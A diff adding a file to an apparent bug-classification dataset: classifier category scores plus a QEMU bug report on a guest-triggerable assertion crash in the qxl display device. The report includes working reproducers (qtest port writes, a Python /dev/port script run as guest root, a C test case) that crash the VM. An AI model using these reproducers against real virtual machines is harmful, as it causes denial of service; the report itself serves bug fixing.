1 files changed, 148 insertions, 0 deletions

diff --git a/results/classifier/118/user-level-risc-v/1829 b/results/classifier/118/user-level-risc-v/1829
new file mode 100644
index 00000000..e8eaf6f9
--- /dev/null
+++ b/results/classifier/118/user-level-risc-v/1829
@@ -0,0 +1,148 @@
+risc-v: 0.971
+user-level: 0.890
+vnc: 0.879
+KVM: 0.851
+debug: 0.839
+ppc: 0.834
+TCG: 0.831
+permissions: 0.831
+performance: 0.826
+network: 0.816
+architecture: 0.813
+hypervisor: 0.812
+register: 0.805
+graphic: 0.801
+VMM: 0.800
+mistranslation: 0.800
+virtual: 0.798
+assembly: 0.790
+x86: 0.789
+socket: 0.778
+peripherals: 0.776
+semantic: 0.770
+arm: 0.769
+kernel: 0.758
+i386: 0.754
+device: 0.745
+PID: 0.738
+files: 0.704
+boot: 0.642
+--------------------
+virtual: 0.965
+x86: 0.959
+TCG: 0.959
+device: 0.856
+PID: 0.805
+risc-v: 0.730
+files: 0.441
+VMM: 0.425
+vnc: 0.377
+debug: 0.147
+ppc: 0.079
+register: 0.050
+socket: 0.031
+KVM: 0.029
+graphic: 0.029
+kernel: 0.022
+assembly: 0.022
+network: 0.012
+boot: 0.011
+architecture: 0.011
+user-level: 0.010
+permissions: 0.010
+performance: 0.010
+semantic: 0.010
+mistranslation: 0.009
+hypervisor: 0.006
+i386: 0.006
+peripherals: 0.005
+arm: 0.001
+
+DoS via assert failure by guest user
+Description of problem:
+As root in guest VM user can execute special script, which crashes the whole VM with error
+
+```plaintext
+hw/display/qxl.c:1594 inside of function void qxl_set_mode(PCIQXLDevice *, unsigned int, int): Assertion `qxl_add_memslot(d, 0, devmem, QXL_SYNC) == 0` failed
+```
+Steps to reproduce:
+1. This bug can be reproduced with:
+
+   ```bash
+   cat << EOF | ./build/qemu-system-x86_64 -vga qxl -m 2048 -nodefaults -qtest stdio
+   outl 0xcf8 0x8000101c
+   outl 0xcfc 0xc000
+   outl 0xcf8 0x80001001
+   outl 0xcfc 0x01000000
+   outl 0xc006 0x00
+   EOF
+   ```
+2. Also, we can execute this python3 script inside guest VM as root (to invoke VM use command: **_qemu-system-x86_64 -vga qxl -hda debian.img -m 2048 -nodefaults_**):
+
+   ```python
+   import os
+   f = os.open("/dev/port", os.O_RDWR|os.O_NDELAY)
+   l = os.lseek(f, 0xcf8, 0)
+   os.write(f, b'\x80\x00\x10\x1c')
+   l = os.lseek(f, 0xcfc, 0)
+   os.write(f, b'\xc0\x00')
+   l = os.lseek(f, 0xcf8, 0)
+   os.write(f, b'\x80\x00\x10\x01')
+   l = os.lseek(f, 0xcfc, 0)
+   os.write(f, b'\x01\x00\x00\x00')
+   l = os.lseek(f, 0xc006, 0)
+   os.write(f, b'\x00')
+   ```
+
+   This script causes VM to crash.
+
+   [PoC_qxl-vga_crash.mkv](/uploads/7ee262c20dca69aa9417812f6a93a532/PoC_qxl-vga_crash.mkv)
+Additional information:
+This issue was found by fuzzing. Here is an auto-generated C source code for a test case that will reproduce the bug.
+
+```plaintext
+/*
+ * Autogenerated Fuzzer Test Case
+ *
+ * Copyright (c) 2023 Artem Nasonov <anasonov@astralinux.ru>
+ *
+ * This work is licensed under the terms of the GNU GPL, version 2 or later.
+ * See the COPYING file in the top-level directory.
+ */
+
+#include "qemu/osdep.h"
+
+#include "libqtest.h"
+
+/*
+ * cat << EOF | qemu-system-x86_64 -vga qxl -hda \
+ * ~/Downloads/virtualdebian.img -m 2048 -nodefaults -qtest stdio
+ * outl 0xcf8 0x8000101c
+ * outl 0xcfc 0xc000
+ * outl 0xcf8 0x80001001
+ * outl 0xcfc 0x01000000
+ * outl 0xc006 0x00
+ * EOF
+*/
+static void test_qxl_set_mode(void)
+{
+QTestState *s = qtest_init("-vga qxl -m 2048 -nodefaults");
+qtest_outl(s, 0xcf8, 0x8000101c);
+qtest_outl(s, 0xcfc, 0xc000);
+qtest_outl(s, 0xcf8, 0x80001001);
+qtest_outl(s, 0xcfc, 0x01000000);
+qtest_outl(s, 0xc006, 0x00);
+qtest_quit(s);
+}int main(int argc, char **argv)
+{
+    const char *arch = qtest_get_arch();
+
+    g_test_init(&argc, &argv, NULL);
+
+   if (strcmp(arch, "x86_64") == 0) {
+        qtest_add_func("fuzz/test_qxl_set_mode",test_qxl_set_mode);
+   }
+
+   return g_test_run();
+}
+```